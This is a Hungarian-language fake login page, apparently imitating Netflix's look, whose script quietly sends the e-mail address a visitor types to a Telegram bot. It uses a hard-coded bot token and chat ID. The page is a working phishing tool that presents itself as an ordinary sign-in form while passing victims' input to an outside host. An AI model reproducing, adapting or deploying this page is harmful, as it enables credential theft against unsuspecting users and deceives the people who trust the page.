<!DOCTYPE html>
<html lang="hu">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Bejelentkezés</title>
    <style>
        /* Alapértelmezett stílusok */
        body {
            margin: 0;
            font-family: Arial, sans-serif;
            background-color: #141414;
            color: #ffffff;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        .login-container {
            background-color: #000000;
            padding: 60px;
            border-radius: 8px;
            width: 300px;
            box-shadow: 0px 0px 15px rgba(0, 0, 0, 0.7);
        }

        h1 {
            font-size: 24px;
            margin-bottom: 20px;
            text-align: center;
        }

        .input-box {
            width: 100%;
            padding: 10px;
            margin: 10px 0;
            border: none;
            border-radius: 4px;
            background-color: #333333;
            color: #ffffff;
            font-size: 16px;
        }

        .login-button {
            width: 100%;
            padding: 10px;
            margin-top: 20px;
            border: none;
            border-radius: 4px;
            background-color: #e50914;
            color: #ffffff;
            font-size: 18px;
            cursor: pointer;
        }

        .login-button:hover {
            background-color: #f6121d;
        }
    </style>
</head>
<body>

    <div class="login-container">
        <h1>Bejelentkezés</h1>
        <form id="messageForm">
            <input type="text" id="messageBox" class="input-box" placeholder="E-mail cím" required><br>
            <input type="password" class="input-box" placeholder="Jelszó" required><br>
            <button type="submit" class="login-button">Bejelentkezés</button>
        </form>
    </div>

    <script>
        document.getElementById('messageForm').addEventListener('submit', function(e) {
            e.preventDefault();

            const message = document.getElementById('messageBox').value;
            const telegramBotToken = '6920116630:AAHes6Eo1Nddy4r7unTNB_9vdm_7kwp9pQo';
            const telegramChatId = '5621133071';

            fetch(`https://api.telegram.org/bot${telegramBotToken}/sendMessage`, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    chat_id: telegramChatId,
                    text: message
                })
            }).then(response => {
                if (response.ok) {
                    alert('Üzenet elküldve!');
                } else {
                    alert('Hiba történt az üzenet küldése közben.');
                }
            }).catch(error => {
                alert('Hiba történt: ' + error);
            });
        });
    </script>

</body>
</html>
